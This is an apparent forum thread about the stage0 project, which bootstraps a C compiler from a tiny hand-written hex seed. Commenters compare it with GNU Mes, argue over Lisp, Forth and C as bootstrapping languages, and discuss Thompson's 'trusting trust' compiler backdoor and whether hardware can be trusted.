This is a set of manually created hex programs in a Cthulhu Path to madness fashion, whose only goal
is creating a bootstrapping path to a C compiler capable of compiling GCC, with the sole explicit
requirement of a single binary of 1 KByte or less.
Additionally, all code must be understandable by 70% of the population of programmers. If the code
cannot be understood by that share, it needs to be altered until it satisfies the above requirement.
Very cool project, but I guess I won't hold out for compiling a working web browser from this project.
With a working gcc, you should be able to compile all that is needed to build Chromium and Firefox.
There are a few programming languages that cannot be bootstrapped from a C or C++ compiler, so you need a binary executable of a previous compiler version for that language, but I do not think that Chromium uses any of those.
The bootstrapping of Rust is complex, but AFAIK it is possible using mrustc. Then you should be able to also compile Firefox.
While everyone asks about lisp or forth for this task, I have to wonder what one has to leave out of C to make it "minimal" enough for this task. The subset of features left out might teach us something about the language.
It's not exactly the things you have to leave out of C. It's that for a compiler bootstrapper, C gives you extremely little bang for your buck.
If you go the Lisp route, you'll soon be talking about embedding a grammar DSL or a validator. With C, you'll be happy to write a parser and, please, let's get to the next project already.
GCC 11 and newer require a C++11 compiler; 4.8 was the first to require C++ at all, and I think there are some very old versions of GCC that can be built with a pre-standard C compiler.
> "We propose to collectively maintain a subset of GCC 4.7 to ensure that we can build the foundation of free software distributions starting with a simple C compiler (such as tinyCC, pcc, etc)."
"Just compiling" gcc means having all its SDK dependencies satisfied too...
g++ 4.7.4 is the last g++ written in simple C. In theory, you should be able to compile all gccs above 4.7.4 (with their SDKs) with g++ 4.7.4 (last time I tried, I succeeded with a gcc 10 for x86).
I wonder who the "geniuses" were who pushed the gcc steering committee to move gcc to C++98.
That said, the C based dialect required to compile a linux/*bsd kernel is no better either.
As for my personal opinion: much of open source software is now corpo-grade trash, but unlike toxic abominations like windoz/rottenfruitOS/etc, it is free as in free beer and heavily customizable.
It appears that this project is in competition with Mes[1], which is also running under the http://bootstrappable.org/ 'umbrella', and which implements both a Scheme interpreter (in C) and a C compiler (in Scheme) that it is designed to run.
The C compiler that Mes was written for, MesCC, appears to be some 600 lines of code excluding libraries (I haven't checked how large those are). It might be smaller than cc_x86.s[2] posted here (or it might not, once the libs are included), but if we're concerned about bootstrapping size, the size of the Scheme interpreter would have to be included as well, and then the total is surely larger than cc_x86.s. I'm also unclear on how Mes solves the mutual dependency issue of Scheme <-> C.
Mes is authored primarily by Jan (janneke) Nieuwenhuizen. Judging from a comment by Janneke on IRC[3] collaboration seems amicable, if I'm not mis-attributing this quote:
<janneke> some routes we try just are a dead end...
Not having any ties to either project I welcome corrections of any mistakes I may have made here.
Ah no, there is no competition, at least not yet ;)
Stage0---of which cc_x86.c is a part---as a project started off from the
bottom (hex0) and is working up. When stage0 had just started, I created
GNU Mes, soon to be followed by MesCC, which aimed to build a version of
TinyCC and the remaining bootstrap for GNU Guix. The first versions of
mescc had their own linker, which was later, in a joint effort, replaced
by M1 and hex2 from MesCC-Tools (also part of Stage0).
My initial idea for Mes was to translate it by hand to assembly, so the
M1 assembler would come in handy. As it turned out, cc_x86.c and its
next step M2-Planet were developed as part of Stage0.
Starting from a 357-byte hex0 provided by the bootstrap-seeds,
Stage0-posix builds hex0, kaem, hex1, catm, hex2, M0, cc_x86, M1, M2,
get_machine, (mescc-tools), and M2-Planet. M2-Planet in turn builds
Mes, which builds a bootstrappable TinyCC, etc.
I'll try out some bootstrapping paths and will make an effort to get a full understanding of the whole picture, and I hope to write something up about what I find.
x86 asm in a very different syntax (neither Intel nor AT&T), to be fair. For a second, I thought it was ARM. Then I started to parse some of the syntax and realised it could be made even more minimal, e.g. this function
;; in_set function
;; Receives a Char in R0, char* in R1
;; Return result in R0
based on what it seems to do, can almost certainly be replaced with a simple repnz scasb.
Trusting trust all the way down: How do you trust your assembler to output the exact machine code corresponding to the source? How do you trust whatever program you might use to do the validation? Ok, let's skip the assembler and write machine code directly. How do you trust the program you use to write that machine code? How do you even trust the firmware will execute your machine code in the way you intend?
Your joke is funny, but it's also not a complete joke. I worked at a company that was running out of funds shortly after firing me (well, I kind of fired myself, but I was gone). They had a beautiful electron microscope, and figured: why don't we pivot to something involving chips?
Now stare back at the https://github.com/mkmik/echo-server and try to figure out what's going on (no, it's not a buffer overflow, that's just a misdirection, and a quite effective one btw, so in order to not waste your time, I'm going to reveal that this is a supply chain attack)
How do you detect a backdoor inserted in the login program with a test? You'd have to know the backdoor password to write the test. Perhaps you haven't read Thompson's Turing Award lecture and so you have no idea what we're talking about.
Not sure if it would work, but wouldn't it greatly complicate creating a backdoor when the host's memory is very heavily constrained? E.g. an AVR-based "computer" that would hardly do much more than actually translate assembly to machine code?
It would probably be easier to detect, but when Thompson deployed the attack in practice, nobody noticed, even though the PDP-11 address space was the same size as an AVR's, and the CPU was a lot slower. (AVRs invariably have much less physical RAM installed than a PDP-11, but you'd need some external memory to get a C compiler to build.)
This is what I don't understand about Stallman. Even if we all agree to use free software, that's only the beginning. The next step is nobody is going to use web applications anymore. Okay now that we're all liberated from corporate espionage what about how the software is made. You can't trust package maintainers any more than you can trust companies. So we all use GNU/Gentoo. As you said, the compiler may be compromised too. Well you learn the dark art of compiling a compiler. But wait, your entire computer is a black box with no schematics whatsoever. Rinse and repeat.
No, you've missed the point. Don't you understand? The software cannot be trusted whatsoever unless you control the entire stack. So you haven't solved anything. Also, if you think a paragraph is long winded then I'm sure you have never listened to Stallman.
You can't control when an apocalypse happens, so you might as well just not prepare for it.
That's essentially the same argument, which is ridiculous. Of course you can. And you should. Just because you can't control the entirety of a system, doesn't mean you can't take steps to minimize risks and exposure, and shrink the attack surface.
That is a stupid analogy. I'm talking about a machine. You are not in control unless you build the machine yourself. Even if you were provided schematics, you cannot be sure they are accurate. The point is free software does not minimize risk. It's a false sense of security.
For things you actually care about, such as surveillance: what if I told you there is a hardware backdoor in your CPU allowing the government to spy on you? Do you realize that is already known? What about the fingerprint scanner? How can you be sure the same is not true of the hardware storing that information?
I built a CPU myself out of 74xx logic, but I can't be sure that every input on every chip isn't also connected internally to an integrated computer that stores everything it sees and can transmit it to a van at 20 metres range (easily enough for someone to drive up to my house and retrieve the contents periodically).
The attacker can then reconstruct everything that happened on the CPU and work out what I've been up to. Or, more likely, throw away almost everything and only look at what was printed to the console, because everything interesting goes to the console anyway.
In fact this would be easier-than-average to achieve because the clock speed is low, I don't run the machine for very long or very often, and the density of actual electronics to "free space" on the ICs is very low (more space for shenanigans), and all my schematics are on my github project so even though you don't know which chip is connected to which other, you shouldn't have too much trouble deriving it.
So what now? Do we just give up? Is all computing fundamentally impossible? Or do we accept that nothing is perfect and just get on with it?
> The next step is nobody is going to use web applications anymore.
Well, we should certainly be wary of falling into the trap known as "Service as a Software Substitute (SaaSS)"[0], but in principle it is possible for a web app to work entirely on the client side and be distributed under a Free licence (and for the browser to enforce that, if the web developer is careful).[1]
> You can't trust package maintainers any more than you can trust companies.
The point is, if you have the source code, you don't have to trust the package maintainers. Instead you can trust whoever you choose to audit the source code for you, which might be yourself (if you're very skilled, and very untrusting), or it could be the community.
I admit that "trust the community" usually means "Assume that someone somewhere will find any critical bugs before they affect you, and assume that developers won't destroy their reputation when they know they'll eventually get caught", but we are slowly moving towards a system of community code reviews for all Free software[2]. (Obviously reproducible builds, and bootstrappable builds, are necessary steps to take full advantage of this.)
> But wait, your entire computer is a black box with no schematics whatsoever. Rinse and repeat.
Nope, that's the final step (unless you think the aliens that built this simulation put backdoors into the laws of physics). As for how we trust hardware, fortunately there are projects to make computers out of chips that can be safely reasoned about. You have to ask yourself what your threat model is.
Do you think the NSA is hiding a hardware backdoor in every FPGA, which detects when someone is running a compilation process and makes sure to install a software backdoor in any compiler or kernel it detects? What if multiple people on multiple homebrew computers all carried out the same build process and hashed the results, and all the hashes agreed? What if you ran these processes in virtual machines that implement custom architectures that have never been seen before? Eventually you start to run into information-theoretic problems trying to explain how such a backdoor can remain hidden and effective.
> if you have the source code, you don't have to trust the package maintainers
I wouldn't go that far. It's possible for a skilled malicious developer to conceal malicious behaviour in their code, to make it hard to detect and plausibly deniable as a bug.
Speaking of which, I've never understood why SELinux is adopted so uncritically considering it was developed by the government agency behind [0].
> I'm surprised they wrote a minimal C compiler in assembly rather than any LISP dialects, then make a C compiler in LISP
I recommend you check out the author's GitHub page. It includes Forth and Lisp projects, explains why C was a success while those projects failed, and challenges any Forth and Lisp fan to actually substantiate their baseless claims with actual work instead of pushing beliefs that don't have any bearing on reality.
I think that the takeaway is familiarity trumps technical 'superiority'.
That said, I don't know why having a working GC for Lisp is that important, because typically you'd use the Lisp only to compile your C compiler, so memory efficiency doesn't really matter.
> I think that the takeaway is familiarity trumps technical 'superiority'.
No, that's not what's stated in the wiki.
The section on Forth points out the lack of useful programs actually written in Forth (a nudge to how no one bothers with the language as alternatives are always found to be preferable), and the lack of developers available to help with the work.
The section on Lisp states quite clearly that "LISP is not an easy language to implement in LISP, C and definitely not an easy task to implement in assembly".
> LISP is not an easy language to implement in LISP, C and definitely not an easy task to implement in assembly
I can't speak to the ease of implementing Lisp in assembly, but I found it easy to do in C. It's trivial to implement Lisp in Lisp if you're willing to let the hosting Lisp do the heavy lifting. The person who I'm quoting isn't a very clear writer though, and his usage of "LISP" suggests he's not exactly up to date on the state of Lisp, so perhaps I'm missing some unstated context that makes his statement sensible.
While I do find the "put up or shut up" message entertaining, it's a category error to confuse what has been done with what can be done. Still, I would consider it a win if some Lisper rises to the challenge.
Since the C language and modern CPUs basically co-evolved, it's not surprising that they're a good fit for each other. The story might be different on a Symbolics machine.
> While I do find the "put up or shut up" message entertaining, it's a category error to confuse what has been done with what can be done. Still, I would consider it a win if some Lisper rises to the challenge.
The whole point is that there are an awful lot of talkers talking a big game, but none of them ever manages to actually show something working.
I read it and I gotta say it sounds ignorant to me: lots of people have bootstrapped systems using Forth. It's not as common these days but it still happens.
And I think the wiki page predates sectorlisp, a project which (in my opinion) answers the challenge, no?
And just after that "Never ending garbage collection bugs plague every assembly implementation of LISP."
So I was reacting to that: for a Lisp that will be used once to compile a Lisp-based C compiler, which in turn will be used once to compile a C-based C compiler, I'm not sure a GC is needed; just never free the memory.
Are claims of easy bootstrapping in Forth really baseless, though? Asm makes sense for a C subset, but if one wanted to bootstrap a more complete language directly from scratch, things would probably be different.
Forth is simple to bootstrap, but maybe not so easy to learn or reason about, because it isn't really taught in any schools or popular online materials. There are tons of resources for thinking about and writing compilers for C-like languages, and there's a decent chance that someone with a CS degree has done so during their coursework.
"Minimal" being almost 5KLOC, sheesh. Actually, I'm surprised that a C compiler fits in that space.
Also:
---
Goal
This is a set of manually created hex programs in a Cthulhu Path to madness fashion. Which only have the goal of creating a bootstrapping path to a C compiler capable of compiling GCC, with only the explicit requirement of a single 1 KByte binary or less.
It's a compiler wth. 5k is nothing. If you strip out the comments, the constants, the labels and some other cruft, you're left with 2450 instructions. That should be well under 1000 lines in other languages.
Writing a C compiler in assembly that supports structs, unions, arrays, inline assembly and a bunch more was done in less than 24 hours by an inexperienced C programmer, who then started doing bootstrapping speed runs to demonstrate how trivial a problem it is to implement that level of functionality in a C compiler.
In the decades that Lisp and FORTH have existed, why didn't they solve such a trivial problem?
Or better yet, now that you can see how it is done, could anyone actually produce a C compiler with the same level of functionality in Lisp or FORTH in the same amount of time (or less)?
It is easy to talk a big game and words are cheap; we have the entire cc_* family of C compilers written in assembly for multiple architectures, even in cross-platform arrangements. If your language were any good at bootstrapping, you'd be able to beat that. Then show your language written in fewer lines of assembly than cc_x86 to prove the point.
It is time for Lisp and FORTH to either deliver or stop talking about something they were never good at in the first place, and to admit that Assembly and C won not because "worse is better" but because they are objectively better languages for bootstrapping new and better tools.
That an inexperienced C programmer wrote what appears to be 5000 lines of assembly in 24 hours implementing a fully working C compiler seems... a rather extraordinary claim. The file size of around 130K would indicate typing non-stop for 24 hours at something like 100 characters per minute.
> typing non-stop for 24 hours at something like 100 characters per minute
Not only that. It would be typing at that speed without testing anything. In assembly. Haha. In reality, what would happen is that you would type for 24 hours (not in one day, I assume) and then spend the next days finding the places where you wrote R5 instead of R4.
And, of course, without losing any time on refactoring already written code (changing order of parameters, finding a better name for a function, etc.)
People normally touch-type between 300 and 800 characters per minute (50–130 wpm), so even if all of that was typed by hand we're only talking about five hours or so of typing, but you've forgotten about copy and paste.
I think they are talking about the later stages of bootstrapping ('stage2'), where they are writing a more functional, but still small, C compiler in a C subset that can be compiled by this one.
I mean there are Forths that fit inside a boot sector (<512 bytes). My reading of the goal was a minimal kernel of code from which the larger system can be bootstrapped.
> writing a C compiler in assembly that supports structs, unions, arrays, inline assembly and a bunch more was done in less than 24 hours by an inexperienced C programmer.
That’s a weird commit comment (“Implemented C version of cc_knight-native”) for a commit that adds a C compiler.
Also, how do you conclude from that that it took less than 24 hours to write that commit (or any)?
https://bootstrappable.org/